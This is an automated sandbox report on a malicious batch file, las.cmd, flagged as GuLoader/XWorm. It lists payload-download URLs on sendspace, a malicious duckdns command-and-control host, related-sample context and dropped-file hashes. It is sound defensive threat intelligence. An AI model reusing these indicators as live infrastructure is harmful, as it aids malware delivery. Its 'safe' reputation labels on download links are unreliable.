                  https://fs03n3.sendspace.com/2wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://go.micropowershell.exe, 00000003.00000002.2527053630.0000027ADAC36000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.sendspace.com/pro/dl/7yi2fuXRpowershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.microsoft.powershell.exe, 00000003.00000002.2607346916.0000027AF1971000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://fs03n4.sendspace.compowershell.exe, 00000003.00000002.2527053630.0000027ADB5AB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.sendspace.com/pro/dl/7yi2fuPpowershell.exe, 00000003.00000002.2527053630.0000027AD99FD000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.sendspace.compowershell.exe, 00000003.00000002.2527053630.0000027ADB586000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2438796376.0000000004E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.sendspace.compowershell.exe, 00000003.00000002.2527053630.0000027AD99FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2527053630.0000027ADB097000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.sendspace.com/pro/dl/lt00vw5wab.exe, 00000009.00000003.2790829519.000000000540D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3240674366.000000000540E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://fs03n3.sendspace.com/wab.exe, 00000009.00000003.2435277716.0000000005437000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3240674366.000000000541F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2790829519.000000000541F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.sendspace.com/wab.exe, 00000009.00000002.3240609884.00000000053C8000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://fs03n4.sendspace.compowershell.exe, 00000003.00000002.2527053630.0000027ADB5BE000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2438796376.0000000004D01000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://fs03n4.sendspace.comXpowershell.exe, 00000003.00000002.2527053630.0000027AD9C64000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2595939938.0000027AE9843000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2441971801.0000000005D6A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://aka.ms/pscore68powershell.exe, 00000003.00000002.2527053630.0000027AD97D1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://fs03n4.sendspaXpowershell.exe, 00000003.00000002.2527053630.0000027ADB5AB000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2527053630.0000027AD97D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2438796376.0000000004D01000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000020F51000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.3255609581.0000000021114000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://fs03n3.sendspace.com/om:443wab.exe, 00000009.00000003.2422890302.0000000005437000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  69.31.136.17
                  		fs03n4.sendspace.comUnited States
                  		3257GTT-BACKBONEGTTDEfalse
                  12.202.180.134
                  		xvern429.duckdns.orgUnited States
                  		22983FISERV-INCUStrue
                  172.67.170.105
                  		www.sendspace.comUnited States
                  		13335CLOUDFLARENETUSfalse

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1446773
                  Start date and time:2024-05-23 20:59:32 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 7s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:12
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:las.cmd
                  Detection:MAL
                  Classification:mal100.troj.evad.winCMD@13/9@6/3
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:
                  • Successful, ratio: 94%
                  • Number of executed functions: 36
                  • Number of non-executed functions: 21
                  Cookbook Comments:
                  • Found application associated with file extension: .cmd

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target powershell.exe, PID 6100 because it is empty
                  • Execution Graph export aborted for target powershell.exe, PID 7056 because it is empty
                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: las.cmd

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  15:00:23API Interceptor928x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  69.31.136.17zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                    kam.cmdGet hashmaliciousGuLoaderBrowse
                      upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                        update.vbsGet hashmaliciousGuLoader, XWormBrowse
                          file.vbsGet hashmaliciousGuLoaderBrowse
                            windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                              windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                  update.vbsGet hashmaliciousGuLoaderBrowse
                                    DOCUMENTS.exe.htmlGet hashmaliciousUnknownBrowse
                                      12.202.180.134kam.cmdGet hashmaliciousUnknownBrowse
                                        sample.cmdGet hashmaliciousUnknownBrowse
                                          zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                            xff.cmdGet hashmaliciousUnknownBrowse
                                              xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                  las.cmdGet hashmaliciousUnknownBrowse
                                                    las.cmdGet hashmaliciousGuLoaderBrowse
                                                      upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                        update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                          172.67.170.105kam.cmdGet hashmaliciousGuLoaderBrowse
                                                            xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                              las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                windows.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                  file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                    time.vbsGet hashmaliciousGuLoaderBrowse
                                                                      file300un.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, VidarBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        www.sendspace.comkam.cmdGet hashmaliciousGuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 104.21.28.80
                                                                        xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 172.67.170.105
                                                                        las.cmdGet hashmaliciousGuLoaderBrowse
                                                                        • 104.21.28.80
                                                                        kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                        • 104.21.28.80
                                                                        upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 104.21.28.80
                                                                        update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 104.21.28.80
                                                                        file.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 104.21.28.80
                                                                        windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                        • 104.21.28.80
                                                                        fs03n3.sendspace.comzap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 69.31.136.17
                                                                        file.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 69.31.136.17
                                                                        file.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 69.31.136.17
                                                                        UHNMA702NQ.vbsGet hashmaliciousUnknownBrowse
                                                                        • 69.31.136.17
                                                                        fs03n4.sendspace.comkam.cmdGet hashmaliciousGuLoaderBrowse
                                                                        • 69.31.136.17
                                                                        1st_Payment.vbsGet hashmaliciousRevengeBrowse
                                                                        • 69.31.136.17
                                                                        xvern429.duckdns.orgsample.cmdGet hashmaliciousUnknownBrowse
                                                                        • 12.202.180.134
                                                                        xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                        • 12.202.180.134
                                                                        file.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 12.202.180.134

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUSkam.cmdGet hashmaliciousGuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 104.21.28.80
                                                                        http://hxjmm.check-tl-ver-154-2.comGet hashmaliciousUnknownBrowse
                                                                        • 104.21.46.101
                                                                        xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 172.67.170.105
                                                                        https://gheenirrigation.zendesk.com/api/v2/channels/voice/calls/CA22db3177fb7a310b9b6e136c494a58df/twilio/voicemail/recordingGet hashmaliciousUnknownBrowse
                                                                        • 104.18.72.113
                                                                        https://t.co/PmbTTSQ6z4Get hashmaliciousUnknownBrowse
                                                                        • 162.247.243.29
                                                                        Offer 15492024 15602024.docx.docGet hashmaliciousUnknownBrowse
                                                                        • 172.67.171.37
                                                                        Purchase Order # PO-00159.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                        • 188.114.96.3
                                                                        LHER000698175.xlsGet hashmaliciousUnknownBrowse
                                                                        • 188.114.96.3
                                                                        GTT-BACKBONEGTTDEkam.cmdGet hashmaliciousGuLoaderBrowse
                                                                        • 69.31.136.53
                                                                        zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 69.31.136.53
                                                                        xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                        • 69.31.136.53
                                                                        las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 69.31.136.53
                                                                        las.cmdGet hashmaliciousGuLoaderBrowse
                                                                        • 69.31.136.53
                                                                        kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                        • 69.31.136.57
                                                                        upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 69.31.136.53
                                                                        update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 69.31.136.53
                                                                        file.vbsGet hashmaliciousGuLoaderBrowse
                                                                        • 69.31.136.17
                                                                        windows.vbsGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                        • 69.31.136.17
                                                                        FISERV-INCUSkam.cmdGet hashmaliciousUnknownBrowse
                                                                        • 12.202.180.134
                                                                        sample.cmdGet hashmaliciousUnknownBrowse
                                                                        • 12.202.180.134
                                                                        zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 12.202.180.134
                                                                        xff.cmdGet hashmaliciousUnknownBrowse
                                                                        • 12.202.180.134
                                                                        xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                        • 12.202.180.134
                                                                        las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 12.202.180.134
                                                                        las.cmdGet hashmaliciousUnknownBrowse
                                                                        • 12.202.180.134
                                                                        las.cmdGet hashmaliciousGuLoaderBrowse
                                                                        • 12.202.180.134
                                                                        upload.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 12.202.180.134
                                                                        update.vbsGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 12.202.180.134

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        3b5074b1b5d032e5620f69f9f700ff0ekam.cmdGet hashmaliciousGuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        S28BW-420120416270,pdf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        Dextron Group PO.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        las.cmdGet hashmaliciousGuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        044f.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        Wgdebahewafthr.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, zgRATBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        37f463bf4616ecd445d4a1937da06e19zap.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        xff.cmdGet hashmaliciousAsyncRAT, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        las.cmdGet hashmaliciousGuLoader, XWormBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        las.cmdGet hashmaliciousGuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        V_273686.Lnk.lnkGet hashmaliciousMalLnkBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        kam.cmdGet hashmaliciousGuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        Platosammine.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        FRA.0038222.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17
                                                                        upload.vbsGet hashmaliciousUnknownBrowse
                                                                        • 172.67.170.105
                                                                        • 69.31.136.17

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):11608
                                                                        Entropy (8bit):4.8908305915084105
                                                                        Encrypted:false
                                                                        SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                                        MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                                        SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                                        SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                                        SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):64
                                                                        Entropy (8bit):1.1940658735648508
                                                                        Encrypted:false
                                                                        SSDEEP:3:NlllulnsiXz:NllUsiX
                                                                        MD5:D664BA2397F45C07CD21EF138C1A4E97
                                                                        SHA1:7D74C67DB2C0D62FF3BCAFF13D0F102E94550D30
                                                                        SHA-256:1C8181B5C6A049E968ECC6F0CDD6F0962A49AEDC6198892A09B15111900A5151
                                                                        SHA-512:5066F8E7285593B4ECBC4B0889C05B7CC71D3FFDA0C1E6CFF1548D04381AD9745034AB2CB0E16D2541EDF1030A4F838BE02C91C3CABCCB949161A4007D724ABC
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:@...e...................................3............@..........

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cyvypyxf.wnr.ps1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqrzrx5e.ebr.ps1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kexi2ema.soo.psm1

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfzb1fft.ftf.psm1

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):6222
                                                                        Entropy (8bit):3.71078384633497
                                                                        Encrypted:false
                                                                        SSDEEP:96:J7W5CzoZkvhkvCCt/fwEKmPHsfwEKmCHp:J6mq/fRifRo
                                                                        MD5:17F31DB43420FEFF5A6C594FD1756E57
                                                                        SHA1:3D28FEDC689B1C2DAAEC89E9E5174A3937DA399C
                                                                        SHA-256:77C60FAC8E6FF110F3EE57B62D35C60FAA00CAAD6847ED993C95021BC7C3CCB4
                                                                        SHA-512:C4C04A7C29C2D78E9842246AC30D7A9730B9BF69347B7231EB87C86B00A2700DA7F05002EC3AE2C2AFEE3B1AB949AD55751C08A1766E40124AB9BB4987DD5DD4
                                                                        Malicious:false
                                                                        Preview:...................................FL..................F.".. ...d......+..sC...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....(..oC....d.tC.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X......B.....................Bdg.A.p.p.D.a.t.a...B.V.1......X....Roaming.@......DWSl.X......C.....................z...R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.X......D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.X......E.....................h.|.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.X......G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.X......H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.X......q...........

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M8Q5QGCJABF090V2TYR5.temp

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):6222
                                                                        Entropy (8bit):3.71078384633497
                                                                        Encrypted:false
                                                                        SSDEEP:96:J7W5CzoZkvhkvCCt/fwEKmPHsfwEKmCHp:J6mq/fRifRo
                                                                        MD5:17F31DB43420FEFF5A6C594FD1756E57
                                                                        SHA1:3D28FEDC689B1C2DAAEC89E9E5174A3937DA399C
                                                                        SHA-256:77C60FAC8E6FF110F3EE57B62D35C60FAA00CAAD6847ED993C95021BC7C3CCB4
                                                                        SHA-512:C4C04A7C29C2D78E9842246AC30D7A9730B9BF69347B7231EB87C86B00A2700DA7F05002EC3AE2C2AFEE3B1AB949AD55751C08A1766E40124AB9BB4987DD5DD4
                                                                        Malicious:false
                                                                        Preview:...................................FL..................F.".. ...d......+..sC...z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.....(..oC....d.tC.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.X......B.....................Bdg.A.p.p.D.a.t.a...B.V.1......X....Roaming.@......DWSl.X......C.....................z...R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.X......D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.X......E.....................h.|.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.X......G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.X......H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.X......q...........

                                                                        C:\Users\user\AppData\Roaming\Preaffirmative.Spo

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):417828
                                                                        Entropy (8bit):5.949874981034092
                                                                        Encrypted:false
                                                                        SSDEEP:12288:flNoUxMIdKKKHzLfxap5chJ8YNGv80PVfgTFBlzq0:0UxDizLYj4lN68SeTFB5q0
                                                                        MD5:2012051E619942968DED1F085EC39637
                                                                        SHA1:F90B37DE2D7D3A42BE724EDE56FCAEBF200B18E8
                                                                        SHA-256:CB6359C5489AD4E7EABE7EE810752D2AE5D305CF060AD345950CBBC9F9460C82
                                                                        SHA-512:17F73368229C4F7DAEA3EF2D6E1D7AE75B06571AD0576A556B49E50634AA065E49DAFA95EB5DA4AF0D393619ABED8A68A92928C5797F240CE799BC93E0AEB053
                                                                        Malicious:false
